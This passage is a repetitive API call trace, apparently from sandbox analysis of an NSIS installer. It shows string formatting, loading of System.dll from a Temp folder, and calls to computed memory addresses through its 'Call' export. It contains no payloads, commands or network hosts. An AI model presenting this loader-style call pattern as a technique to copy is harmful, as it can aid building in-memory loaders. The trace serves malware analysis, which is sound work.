[0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.032] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="324") returned 3 [0158.032] lstrcpyA (in: lpString1=0x431800, lpString2="324" | out: lpString1="324") returned="324" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.032] lstrcpyA (in: lpString1=0x430800, lpString2="380" | 
out: lpString1="380") returned="380" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="400") returned 3 [0158.032] lstrcpyA (in: lpString1=0x431000, lpString2="400" | out: lpString1="400") returned="400" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3311496") returned 7 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.032] lstrlenA (lpString="1224") returned 4 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="380", iMaxLength=1024 | out: lpString1="380") returned="380" [0158.032] lstrlenA (lpString="380") returned 3 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="400", iMaxLength=1024 | out: lpString1="400") returned="400" [0158.032] lstrlenA (lpString="400") returned 3 [0158.032] lstrcpynA (in: lpString1=0x40ac18, lpString2="400", iMaxLength=1024 | out: lpString1="400") returned="400" [0158.032] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.032] lstrcmpiA (lpString1="400", lpString2="0") returned 1 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3311496", iMaxLength=1024 | out: lpString1="3311496") returned="3311496" [0158.032] lstrlenA (lpString="3311496") 
returned 7 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="400", iMaxLength=1024 | out: lpString1="400") returned="400" [0158.032] lstrlenA (lpString="400") returned 3 [0158.032] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3311896") returned 7 [0158.033] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.033] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.033] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.033] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.033] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3311896", 
iMaxLength=1024 | out: lpString1="3311896") returned="3311896" [0158.033] lstrlenA (lpString="3311896") returned 7 [0158.033] lstrcpynA (in: lpString1=0x336d34, lpString2="*3311896(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3311896(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3311896(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.033] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.033] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.033] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.034] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.034] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311896" | out: lpString1="3311896") returned="3311896" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: 
lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="372") returned 3 [0158.034] lstrcpyA (in: lpString1=0x431800, lpString2="372" | out: lpString1="372") returned="372" [0158.034] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="392") returned 3 [0158.035] lstrcpyA (in: lpString1=0x430800, lpString2="392" | out: lpString1="392") returned="392" [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: 
param_1="784") returned 3 [0158.035] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3311896") returned 7 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.035] lstrlenA (lpString="1224") returned 4 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="392", iMaxLength=1024 | out: lpString1="392") returned="392" [0158.035] lstrlenA (lpString="392") returned 3 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.035] lstrlenA (lpString="784") returned 3 [0158.035] lstrcpynA (in: lpString1=0x40ac18, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.035] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.035] lstrcmpiA (lpString1="784", lpString2="0") returned 1 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3311896", iMaxLength=1024 | out: lpString1="3311896") returned="3311896" [0158.035] lstrlenA (lpString="3311896") returned 7 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.035] lstrlenA (lpString="784") returned 3 [0158.035] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3312680") returned 7 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.035] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.035] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.035] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.036] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.036] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.036] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3312680", iMaxLength=1024 | out: lpString1="3312680") returned="3312680" [0158.036] lstrlenA (lpString="3312680") returned 7 [0158.036] lstrcpynA (in: lpString1=0x336d34, lpString2="*3312680(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3312680(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3312680(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.036] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.036] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.036] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.036] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.036] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.037] lstrcpyA (in: lpString1=0x321ba8, lpString2="3312680" | out: lpString1="3312680") returned="3312680" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="372") returned 3 [0158.038] lstrcpyA (in: lpString1=0x431800, lpString2="372" | out: lpString1="372") returned="372" [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="432") returned 3 [0158.038] lstrcpyA (in: lpString1=0x430800, lpString2="432" | out: lpString1="432") returned="432" [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="472") returned 3 [0158.038] lstrcpyA (in: lpString1=0x431000, lpString2="472" | out: lpString1="472") returned="472" [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3312680") returned 7 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.038] lstrlenA (lpString="1224") returned 4 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="432", iMaxLength=1024 | out: lpString1="432") returned="432" [0158.038] lstrlenA (lpString="432") returned 3 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="472", iMaxLength=1024 | out: lpString1="472") returned="472" [0158.038] lstrlenA (lpString="472") 
returned 3 [0158.038] lstrcpynA (in: lpString1=0x40ac18, lpString2="472", iMaxLength=1024 | out: lpString1="472") returned="472" [0158.038] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.038] lstrcmpiA (lpString1="472", lpString2="0") returned 1 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3312680", iMaxLength=1024 | out: lpString1="3312680") returned="3312680" [0158.038] lstrlenA (lpString="3312680") returned 7 [0158.039] lstrcpynA (in: lpString1=0x42e3a0, lpString2="472", iMaxLength=1024 | out: lpString1="472") returned="472" [0158.039] lstrlenA (lpString="472") returned 3 [0158.039] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3313152") returned 7 [0158.039] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.039] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.039] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.039] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.039] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.039] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.039] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.040] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3313152", iMaxLength=1024 | out: lpString1="3313152") returned="3313152" [0158.040] lstrlenA (lpString="3313152") returned 7 [0158.040] lstrcpynA (in: lpString1=0x336d34, lpString2="*3313152(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3313152(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3313152(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.040] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.040] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.040] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.040] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.040] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.040] lstrcpyA (in: lpString1=0x321ba8, 
lpString2="3313152" | out: lpString1="3313152") returned="3313152" [0158.040] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.041] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.041] lstrcpyA (in: lpString1=0x430800, lpString2="476" | out: lpString1="476") returned="476" [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: 
param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="920") returned 3 [0158.042] lstrcpyA (in: lpString1=0x431000, lpString2="920" | out: lpString1="920") returned="920" [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3313152") returned 7 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.042] lstrlenA (lpString="1224") returned 4 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="476", iMaxLength=1024 | out: lpString1="476") returned="476" [0158.042] lstrlenA (lpString="476") returned 3 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="920", iMaxLength=1024 | out: lpString1="920") returned="920" [0158.042] lstrlenA (lpString="920") returned 3 [0158.042] lstrcpynA (in: lpString1=0x40ac18, lpString2="920", iMaxLength=1024 | out: lpString1="920") returned="920" [0158.042] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.042] lstrcmpiA (lpString1="920", lpString2="0") returned 1 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3313152", iMaxLength=1024 | out: lpString1="3313152") returned="3313152" [0158.042] lstrlenA (lpString="3313152") returned 7 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="920", iMaxLength=1024 | out: lpString1="920") returned="920" [0158.042] lstrlenA (lpString="920") returned 3 [0158.042] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3314072") returned 7 [0158.042] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.042] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.042] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.042] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.043] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.043] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.043] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.043] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3314072", iMaxLength=1024 | out: lpString1="3314072") returned="3314072" [0158.043] lstrlenA (lpString="3314072") returned 7 [0158.043] lstrcpynA (in: lpString1=0x336d34, lpString2="*3314072(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | 